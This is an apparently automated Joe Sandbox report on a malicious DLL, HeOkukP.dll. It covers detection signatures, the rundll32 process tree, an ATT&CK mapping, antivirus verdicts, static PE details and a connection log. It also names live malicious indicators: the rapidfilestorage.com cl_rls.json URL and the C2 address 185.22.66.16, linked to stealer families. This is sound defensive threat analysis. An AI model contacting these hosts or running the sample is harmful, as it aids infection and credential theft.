Edit tour

Windows Analysis Report
HeOkukP.dll

Overview

General Information

Sample name:	HeOkukP.dll
Analysis ID:	1502264
MD5:	57c5d2950f3b91f96c81ae32e1b01a44
SHA1:	53645e86895b877cfd5b8284dbcc8c0314337b8c
SHA256:	d11a6b623af75e54374bea05172b2193f93e2a8aa479ed13a7b1d19dd3738245
Tags:	dll
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Machine Learning detection for sample

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7704 cmdline: loaddll32.exe "C:\Users\user\Desktop\HeOkukP.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7784 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 7816 cmdline: rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7792 cmdline: rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8024 cmdline: rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Code function: 5_2_04C2F0EF EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

5_2_04C2F0EF

Source: C:\Windows\SysWOW64\rundll32.exe

5_2_04C2F0EF

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04C211A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_04C211A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04BD11A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_04BD11A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_056511A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_056511A4

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.22.66.16 80

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_04C2E1C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __IsNonwritableInCurrentImage,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	5_2_04C233B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_04C22C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __IsNonwritableInCurrentImage,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	7_2_04BD33B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_04BDE1C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_04BD2C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	9_2_05652C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __crtGetLocaleInfoA_stat,	9_2_0565E1C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __IsNonwritableInCurrentImage,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__calloc_crt,__invoke_watson,	9_2_056533B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	111 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Rundll32	NTDS	11 System Information Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HeOkukP.dll	41%	Virustotal		Browse
HeOkukP.dll	32%	ReversingLabs
HeOkukP.dll	100%	Avira	HEUR/AGEN.1300638
HeOkukP.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
env-3936544.jcloud.kz	5%	Virustotal		Browse
www.rapidfilestorage.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://crash-reports.mozilla.com/submit?id=	0%	URL Reputation	safe
http://www.rapidfilestorage.com/clrls/cl_rls.jsonB	100%	Avira URL Cloud	malware
http://www.rapidfilestorage.com/clrls/cl_rls.jsonLz	100%	Avira URL Cloud	malware
http://www.rapidfilestorage.com/clrls/cl_rls.json)	100%	Avira URL Cloud	malware
http://www.rapidfilestorage.com/clrls/cl_rls.json;	100%	Avira URL Cloud	malware
https://hg.mozilla.org/releases/mozilla-release	0%	Avira URL Cloud	safe
http://www.rapidfilestorage.com/clrls/cl_rls.jsond	100%	Avira URL Cloud	malware
http://www.rapidfilestorage.com/clrls/cl_rls.json	100%	Avira URL Cloud	malware
http://www.rapidfilestorage.com/clrls/cl_rls.jsonu	100%	Avira URL Cloud	malware
http://www.rapidfilestorage.com/clrls/cl_rls.jsonB	2%	Virustotal		Browse
https://hg.mozilla.org/releases/mozilla-release	0%	Virustotal		Browse
http://www.rapidfilestorage.com/clrls/cl_rls.json;	2%	Virustotal		Browse
http://www.rapidfilestorage.com/clrls/cl_rls.json	2%	Virustotal		Browse
http://www.rapidfilestorage.com/clrls/cl_rls.jsonu	2%	Virustotal		Browse
http://www.rapidfilestorage.com/clrls/cl_rls.jsond	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
env-3936544.jcloud.kz	185.22.66.16	true	true	5%, Virustotal, Browse	unknown
www.rapidfilestorage.com	unknown	unknown	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.rapidfilestorage.com/clrls/cl_rls.json	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.rapidfilestorage.com/clrls/cl_rls.jsonB	rundll32.exe, 00000007.00000003.1336450668.00000000028E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.00000000028E2000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://hg.mozilla.org/releases/mozilla-release	rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.rapidfilestorage.com/clrls/cl_rls.jsonLz	rundll32.exe, 00000009.00000003.1368849550.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368526440.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.000000000339A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://crash-reports.mozilla.com/submit?id=	rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.rapidfilestorage.com/clrls/cl_rls.json)	rundll32.exe, 00000005.00000003.1336028674.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.rapidfilestorage.com/clrls/cl_rls.json;	rundll32.exe, 00000009.00000002.1369354017.0000000003340000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1369059378.000000000333A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368849550.0000000003333000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.rapidfilestorage.com/clrls/cl_rls.jsond	rundll32.exe, 00000005.00000003.1336500957.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336963668.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.rapidfilestorage.com/clrls/cl_rls.jsonu	rundll32.exe, 00000005.00000003.1336028674.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.22.66.16	env-3936544.jcloud.kz	Kazakhstan		48716	PSKZ	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502264
Start date and time:	2024-08-31 22:04:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HeOkukP.dll
Detection:	MAL
Classification:	mal88.evad.winDLL@10/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.22.66.16	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?cyQFFYXfMxTbmOSMGoSEriCQDgQhzEzaB
	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Get hash	malicious	Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar	Browse	www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?KubbvdjJfOkOrksIlOLwwrZZFcTPifwjk
	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?pvxjjZzJfBoShjdxqXwarNhIJWxMQBmcQ
	file.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	www.rapidfilestorage.com/clrls/cl_rls.json
	setup.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, Vidar	Browse	www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?jEvIItcUYFPwlFHkOhJhTyAHjyfMbxfRv
	1720605557.036432_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, Vidar	Browse	www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	www.rapidfilestorage.com/clrls/cl_rls.json
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	www.rapidfilestorage.com/clrls/cl_rls.json
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?DsLygfFkDtSUzoPXLskPMSsoCsdOUcoMp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
env-3936544.jcloud.kz	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	185.22.66.16
	setup.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.15
	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Get hash	malicious	Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.22.66.16
	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	185.22.66.16
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	Install.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.15
	setup.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	Install.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PSKZ	CGVYlOv.wsf	Get hash	malicious	Unknown	Browse	185.22.66.16
	press to unblock document.vbs	Get hash	malicious	Emotet	Browse	94.247.135.151
	https://vetdiagnoz.kz/templates/beez3/voice.html	Get hash	malicious	HTMLPhisher	Browse	195.210.47.120
	RechnungsDetails 2023.08.03_1031.zip.zip	Get hash	malicious	Emotet	Browse	94.247.135.151
	PO-465514-180820.doc.zip	Get hash	malicious	Unknown	Browse	195.210.46.42
	PO-465514-180820.doc.zip	Get hash	malicious	Unknown	Browse	195.210.46.42
	http://barsugo.com/ckfinder/userfiles/files/gamapixejoxawifom.pdf	Get hash	malicious	GRQ Scam	Browse	195.210.46.56
	SM3prh5ZIG.dll	Get hash	malicious	Wannacry	Browse	94.247.128.206
	DHL_SHIPMENT CONFIRMATION.vbs	Get hash	malicious	FormBook, GuLoader	Browse	195.210.46.41

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.803660030165451
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HeOkukP.dll
File size:	6'726'144 bytes
MD5:	57c5d2950f3b91f96c81ae32e1b01a44
SHA1:	53645e86895b877cfd5b8284dbcc8c0314337b8c
SHA256:	d11a6b623af75e54374bea05172b2193f93e2a8aa479ed13a7b1d19dd3738245
SHA512:	938257c4e5238f395229673428307b20f3662a69d20bc48d2f80dc2dfa7971dc72780d18549636ea292011646a15a5ed06ea00dafc1c928af48eb5a13ae66677
SSDEEP:	98304:i/Nf5fRmhQ1orSk3GCK4J7vADNR6oXc0/8+x0bRtI4PPgbYhiLC9kEN6+/mu:mfiQ15M2aIDS0i+SRi4samC9bN9O
TLSH:	FD661238A300E610EC69DB7F27E6089E15542EB325D861C3B65935153F787E0F6E2B2E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i1b.._1.._1.._1.Z.1.._1.Z.1.._1.Z.1M._1R..1.._1..^19._1:..1.._1:..1.._1:..1.._1:..1.._1Rich.._1........................PE..L..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10060ca6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	NX_COMPAT
Time Stamp:	0x616BE6B0 [Sun Oct 17 09:02:40 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	f97432a3249488bbad6577e538ae4c50

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FEFE457B817h
call 00007FEFE4585B0Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FEFE457B81Ch
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 10079B68h
call 00007FEFE457F490h
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007FEFE457B81Eh
cmp dword ptr [10667CC0h], esi
je 00007FEFE457B8FAh
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007FEFE457B817h
cmp esi, 02h
jne 00007FEFE457B847h
mov ecx, dword ptr [100026C8h]
test ecx, ecx
je 00007FEFE457B81Eh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FEFE457B8C7h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007FEFE457B626h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FEFE457B8B0h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007FEFE4585B1Fh
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007FEFE457B83Ah
test edi, edi
jne 00007FEFE457B836h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007FEFE4585B07h
push ebx
push edi
push dword ptr [ebp+08h]
call 00007FEFE457B5ECh
mov eax, dword ptr [100026C8h]
test eax, eax
je 00007FEFE457B819h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 UPD5 build 40629
[EXP] VS2013 UPD5 build 40629
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7a140	0x38	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x66a2a0	0x78	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66c000	0x30f8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7ca8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x66a000	0x2a0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x79178	0x79200	564be5cced7e69c5b175f41303bd5a21	False	0.48263149832301344	data	6.352246855438842	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x7b000	0x5eedcc	0x5ec800	da1bab48eefc3456574bcc7ece7a1a46	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x66a000	0x10fc	0x1200	d0b05efd35b5c7e3ef96e48186266571	False	0.4457465277777778	DOS executable (COM, 0x8C-variant)	5.364677663489182	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66c000	0x30f8	0x3200	f21fdbf1777501eeadfa6759b96d303e	False	0.72828125	data	6.543828454975629	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleExW, ExitProcess, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, HeapSize, IsProcessorFeaturePresent, GetProcAddress, GetModuleHandleW, GetStartupInfoW, TlsFree, GetProcessHeap, IsDebuggerPresent, IsValidCodePage, GetOEMCP, GetStdHandle, GetFileType, GetModuleFileNameA, GetCurrentProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteFile, CloseHandle, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, SetFilePointerEx, LoadLibraryExW, OutputDebugStringW, SetStdHandle, WriteConsoleW, ReadConsoleW, LocalFree, GetEnvironmentVariableW, CreatePipe, CreateFileMappingA, ResetEvent, GetACP, GetProcessTimes, GetWindowsDirectoryA, GlobalLock, GetCurrentProcess, FreeLibrary, TlsGetValue, DeleteFileA, LoadLibraryA, FindClose, FindFirstFileA, RaiseException, CreateFileW, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, TlsSetValue, TlsAlloc, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, GetStringTypeW, GetLastError, HeapReAlloc, GetSystemTimeAsFileTime, HeapFree, RtlUnwind, GetCommandLineA, GetCurrentThreadId, GetCPInfo, HeapAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, Sleep, TerminateProcess
USER32.dll	CheckMenuItem, ToAsciiEx, SetCapture, IsZoomed, LoadStringA, DeleteMenu, GetParent, MessageBeep, DrawEdge, CreateIconIndirect, DrawFocusRect, ShowCursor, ReleaseDC, EnableMenuItem, ScrollWindow, RedrawWindow, CreatePopupMenu, CreateCaret, RemoveMenu, SetCaretPos, DrawFrameControl, TranslateMDISysAccel, SetWindowRgn, SendDlgItemMessageA, GetDC, GetQueueStatus, GetWindowTextA, GetScrollInfo, UnionRect, UnregisterClassA, SystemParametersInfoW, SetClassLongA, GetDesktopWindow, IsDlgButtonChecked, DrawMenuBar, GetSystemMetrics, ValidateRgn, DialogBoxParamA, GetCaretBlinkTime
GDI32.dll	PolyPolygon, MaskBlt, SetPixel, CreateCompatibleDC, PlayEnhMetaFile, CombineRgn, RectInRegion, Rectangle, Ellipse, SaveDC, SetPolyFillMode, GetCurrentPositionEx, GetDIBColorTable, SetStretchBltMode, CreatePatternBrush, GetClipBox, SetTextAlign, CreateDIBitmap, GetPixel, SetWindowOrgEx, Arc, GetTextExtentPoint32A, SetWindowExtEx, SetTextColor, CreateHatchBrush, CreateFontA, GetDIBits, SetBkColor, ExcludeClipRect, CreateHalftonePalette, DeleteObject, SelectObject, GetCharABCWidthsFloatA, SetViewportExtEx, GetStockObject, CloseEnhMetaFile, RestoreDC, UpdateColors, GetTextExtentExPointA
ADVAPI32.dll	AllocateAndInitializeSid, RegCloseKey, RegOpenKeyExA, CopySid
ole32.dll	CoTaskMemFree

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2024 22:05:13.922177076 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:13.927761078 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:13.928428888 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:13.928504944 CEST	49709	80	192.168.2.7	185.22.66.16
